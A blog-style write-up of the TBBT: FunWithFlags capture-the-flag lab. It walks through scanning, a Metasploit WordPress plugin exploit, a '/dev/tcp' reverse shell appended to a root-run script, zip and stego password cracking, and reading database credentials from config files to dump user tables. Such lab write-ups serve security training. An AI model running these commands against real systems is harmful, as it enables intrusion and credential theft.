TBBT - FunWithFlags CTF Writeup

Back Again with a new boot2root CTF
Lab Environment

 Attacker's Machine: Linux kali 5.3.0-kali2-amd64 #1 SMP Debian 5.3.9-3kali1 (2019-11-20) x86_64 GNU/Linux

Victim's Machine: TBBT: FunWithFlags

Mapping the local network to determine the IP of Vulnerable Machine

Command Used: arp-scan --local 




Now Scanning and enumerating the IP address with Nmap

All Ports Scan
  • Command Used: Nmap -p- 192.168.1.105
  • ftp, ssh, http, waste services are active

Since, http service is active dirb can burst the directories and can reveal some import directories if present.

Command Used: dirb http://192.168.1.105 
Results: Wordpress Directory 


Now since we know that there is a Wordpress directory so Wpscan is a better option to enumerate.
Command Used: wpscan --url http://192.168.1.105/music/wordpress --enumerate ap
Explanation: ap means All Plugins 

Results: One plugin Found which is out of date named reflex-gallery




Now, Using msfconsole to search if there is any exploit available or not.
Firing up msfconsole by command: msfconsole 
Searching the name of exploit of desired plugin to check if it is available or not.
Command Used: search reflex
Results: one exploit is available for the same plugin

Using the above exploit and setting the necessary options to run exploit.
Command Used: use exploit name OR use serial number of exploit that is zero(0).
Command Used: options to view the requirements and setting them.
Command Used: set rhosts 192.168.1.105(Victim's machine IP)
Command Used: set targeturi /music/wordpress directory of Wordpress
Command Used: exploit OR run to execute the exploit

Results: meterpreter session is opened 


Once the meterpreter session is opened access the shell and spawn the shell.
Command Used: shell to access the shell 
Command Used: python -c 'import pty;pty.spawn("/bin/bash")' to spawn the shell
Results: Full Access to shell  

Now exploring the directories for collecting 7 Flags
Command Used: 
  1. cd /home
  2. ls
  3. 7 users listed
  4. cd amy
  5. ls -la
  6. strings secretdiary
Results: Navigating to Amy and reading the strings of secretdiary and got our Flag

Navigating to Leonard.
Command Used:
  1. cd /leonard
  2. ls -la
  3. cat thermostat_set_temp.sh
Results: Script was empty
echo "bash -i >& /dev/tcp/192.168.1.19/9999 0>&1" >> thermostat_temp.sh
Executing the script now: ./thermostat_set_temp.sh and listening with Netcat on given port 9999.
Command Used: nc -lvp 9999

*we got root privileges with nc and now we will be able to navigate to root folder and can read flag of Leonard.

cat FLAG-leonard.txt



Navigating to penny folder.
Command Used: 
  1. cd /penny
  2. ls -la
  3. cat .FLAG.penny.txt

We got three flags till now so we return to our Nmap results and notice there was one port 1337 with a service named waste was active.
Tried to connect Netcat with that open port.
Command Used: nc 192.168.1.105 1337
Results: Got one more flag

I noticed that ftp port was missed by me which can have some useful info
Connected to ftp port 
Command Used: ftp 192.168.1.105
Password: anonymous(use Nmap -script vuln 192.168.1.105, you will see anonymous login is enabled)
navigated to /pub/howard folder and downloaded the zip file which was password protected 
Command Used: get filename

to crack the password of zip file I used fcrackzip
Command Used: fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt /root/super_secret_nasa_stuff_here.zip

After unzipping this we got .jpg file which was just an image, I was having an idea of steganography so I used stegcracker to crack this jpg image file.
Command Used: stegcracker filename.jpg 
Results: Password found "iloveyoumom", An output file is generated with filename.jpg.out 

cat filename.jpg.out 
Results: Got our 5th Flag

Now back to Netcat where we got the root access see *
I navigated to cd /var/www/html/private and read the db_config.php file containing the username and pass of database.
Command Used: cat db_config.php
Now, again spawning the shell with python: python -c 'import pty;pty.spawn("/bin/bash")'
Connecting to mysql: mysql -u username -p
Password is: weareevil mentioned in db_confi.php file
You will get connected to mysql 
Commands Used: 
  • Show databases;
  • show tables;
  • select * from users;
Result: 6th flag 

Now navigating to Wordpress database cd /var/www/html/music/wordpress
and reading wp-config.php file using cat wp-config.php 
Results: one more username and password for mysql
Connecting to mysql: mysql -u username -p 
Password: from wp-config.php file
Commands Used:
  1. show databases;
  2. show tables;
  3. select * from wp_users;
Results: 7th flag





























Popular posts from this blog

Calculat3 M3 | CTF Learn

Image
This walkthrough will demonstrate the simple challenge based on command injection Calculat3 M3 This is the challenge page we got after visiting the given link. I provided random input in this calculator and intercepted the request with BurpSuite I got one parameter "expression" taking the values  Tried for command injection with ";ls" Forwarding the above request finally Got the Flag
Read more

TryHackme: Blue Walkthrough

Image
Task 1: Recon After we've connected to the tryhackme network the first task is to enumerate the target. We use Nmap for scanning the target IP. Command Used : nmap -sS -Pn <target-ip> -sS : Scan using TCP SYN scan -Pn : Treats all host as online --skip host discovery Next we used a command to find the vulnerability on the target machine. Command Used : nmap --script vuln <target-ip> --script : Specify the --script option to choose your own scripts to execute by providing categories , script file names, or the name of directories full of scripts you wish to execute. vuln : These scripts check for known vulnerabilites and generally only report results if they are found. Below, we see that nmap is indicating the target may be vulnerable to ms17-010(on the left0 and we can verify this using metasploit. To start Metasploit use command "msfconsole" We start by simply doing a search for ms17-010 Here we use module 2 i.e. exploit/windows...
Read more

HackTheBox-Traceback Walkthrough

Image
I started with scanning the IP Addr with nmap using the simple command. Command Used: nmap IP Addr of machine -Pn  nmap 10.10.10.181 -Pn  Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-15 02:27 IST Nmap scan report for 10.10.10.181 Host is up (0.18s latency). Not shown: 998 closed ports PORT   STATE SERVICE 22/tcp open  ssh 80/tcp open  http Now only two things were in my mind and those were what should I enumerate first ssh or http. SSH can only be bruteforced and this point and bruteforce on the online machine doesn't works or we can say that most online hosted machines are not made to be bruteforced. So, I started  with HTTP. I fired up directory burster to find juicy directories if any and mean while I decided to browse the IP Addr since HTTP Service is active and running. I was presented with the below screen  dirb was not able to find any directories ...
Read more